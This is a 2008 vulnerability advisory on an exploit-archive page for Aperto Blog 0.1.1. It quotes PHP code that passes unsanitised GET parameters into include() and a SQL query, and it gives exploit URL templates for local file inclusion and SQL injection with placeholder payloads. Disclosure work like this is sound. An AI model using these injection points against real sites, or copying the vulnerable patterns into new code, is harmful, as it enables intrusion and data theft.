Aperto Blog 0.1.1 Local File Inclusion / SQL Injection

Aperto Blog 0.1.1 Local File Inclusion / SQL Injection: Posted Dec 15, 2008; Authored by NoGe; Aperto Blog version 0.1.1 suffers from local file inclusion and remote SQL injection vulnerabilities.; tags | exploit, remote, local, vulnerability, sql injection, file inclusion; SHA-256 | 52bb5e271841d5235a3a5c1b9bcf88e9127ece4df79b8c3a170ced44839aff1b; Download | Favorite | View

Aperto Blog 0.1.1 Local File Inclusion / SQL Injection

===========================================================================================================
 
 
  [o] Aperto Blog 0.1.1 Local File Inclusion and SQL Injection Vulnerabilities
 
       Software : Aperto Blog version 0.1.1
       Vendor   : http://code.google.com/p/apertoblog/
       Download : http://code.google.com/p/apertoblog/downloads/list
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com
 
 
===========================================================================================================
 
 
  [o] Vulnerable file
 
       admin.php
 
        if(isset($_GET['action'])) {
        if($_GET['action']=="logout") {
        session_destroy();
        go('index.php');
        } else {
        if(file_exists($_GET['action'].".php")) {
        include($_GET['action'].".php");
        } else {
        echo "404";
 
       index.php
 
        if(!$_GET['get']) {
        $articles = mysql_query("SELECT * FROM articles ORDER BY id DESC LIMIT 10");
        while($row = mysql_fetch_array($articles)) {
        showarticle($row, $settings[5]);
        }
        } elseif(file_exists($_GET['get'].".php")) {
        include($_GET['get'].".php");
        } else {
        echo "404";
 
       categories.php
 
        if(isset($_GET['id'])) {
        $cid = $_GET['id'];
        //Load category info
        $getcat = mysql_query("SELECT * FROM categories WHERE id='$cid'");
 
 
 
  [o] Exploit
 
       [ Local File Inclusion ]
 
     http://localhost/[path]/admin.php?action=[LFI]
     http://localhost/[path]/index.php?get=[LFI]
 
       [ SQL Injection ]
 
     http://localhost/[path]/categories.php?id=[SQL]
 
 
===========================================================================================================
 
 
  [o] Greetz
 
       MainHack BrotherHood [ http://mainhack.com/ ]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
       H312Y yooogy mousekill }^-^{ kaka11 martfella
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
 
       GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]
 
         
===========================================================================================================

Top Authors In Last 30 Days

Red Hat 250 files
Ubuntu 111 files
indoushka 49 files
Jasper Nota 25 files
Gentoo 19 files
Willem Westerhof 19 files
Debian 12 files
Jim Blankendaal 11 files
Apple 10 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,085)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,603)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,440)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,724)
UNIX (9,433)
UnixWare (187)
Windows (6,668)
Other

Aperto Blog 0.1.1 Local File Inclusion / SQL Injection

Aperto Blog 0.1.1 Local File Inclusion / SQL Injection

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Aperto Blog 0.1.1 Local File Inclusion / SQL Injection

Share This

Aperto Blog 0.1.1 Local File Inclusion / SQL Injection

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems